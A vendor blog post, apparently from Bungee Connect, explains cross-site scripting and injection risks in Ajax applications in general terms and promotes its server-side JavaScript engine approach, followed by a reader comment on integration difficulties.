How do you get interactivity, securely?

Picture 12.png

Recently I wrote about why rich interactivity matters but what are the concerns around it? Ajax has made new kinds of web applications possible by bringing interactivity usually seen only on the desktop to a web browser. Google Maps and countless other web applications have begun adding interactivity throughout the application.

It isn’t easy though. Many times interactivity is cobbled into existing applications with a mish-mash of code–creating a Frankenstein of multiple technologies and line-after-line of code. This approach is difficult to maintain and can open several security threats to the user, server and data.

When using javascript, two big security vulnerabilities include:

  • Cross-site scripting (XSS) is a problem where code from another, potentially malicious, site is executed as if it were from a trusted site. This type of attack can result in identity theft and unauthorized access to data and subsystems.
  • Injection vulnerabilities exist when an attacker can inject their own inputs into the web application and spoof certain commands to gain access to a file system or data set.

These are very important concerns for a business to consider as they begin adding interactivity to their site. Managing these risks requires a significant investment in time and resources throughout the life of an application.

Are these risks, and the cost of managing them, just the price of adding interactivity? At Bungee we don’t believe it is.

Bungee Connect takes a strong stance on security through a unique approach to these issues:

  • Cross-site scripting is eliminated by moving the access to other domains and sites to the server, and never the client. In this way all requests and responses are parsed by the server then sent down to the client. If an issue is encountered the malicious code is not executed or passed through to the client.
  • Injection vulnerabilities are reduced by removing all code from the client and leaving it on the server. In this way users (potential hackers) cannot see how the business logic is executed or what sub-systems or databases are accessed. By keeping this information away from the client it is impossible for the hacker to see which inputs are required for a specific function and replicate its request by sending malicious data. Instead of using specific client-side code, a genericized javascript engine is used to communicate between the client and server. This generic javascript engine uses unique identifiers to identify objects and functions. For additional security, these unique identifiers change with each session. In this way the Bungee Connect javascript engine acts like a security sandbox for any Bungee-powered application.
  • The javascript payload is a single payload, it never changes as an application incrementally changes. The benefit here is that a security team can validate this package once and feel confident that any changes in the future will not open any vulnerabilities. Thus significantly reducing the amount of work required in delivering an application.

Users are requiring more interactivity, but that doesn’t mean you need to sacrifice security or increase your cost of delivering an application. By employing a generalized javascript engine through Bungee Connect you can securely and quickly add the interactivity you need with less development time and strong security.

1 Comment »

  1. Granted, this approach does provide substantial security benefit and simplified deployment.

    The downfall, in this specific area, is in integration with tools and solutions already in place in javascript. Integrating Google Analytics, in particular, is proving to be incredibly difficult in BungeeConnect, whereas it is a simple copy/paste function in a more traditional web app (HTML, PHP, RoR, ASP.net, etc.)

    Other Javascript APIs, like that of OpenSocial, require generating a javascript wrapper, and then passing query parameters to an iFrame, instead of running the app in the client’s DOM; a less than optimal solution that still requires developers to use, and know, javascript, as well as BungeeConnect.

RSS feed for comments on this post · TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: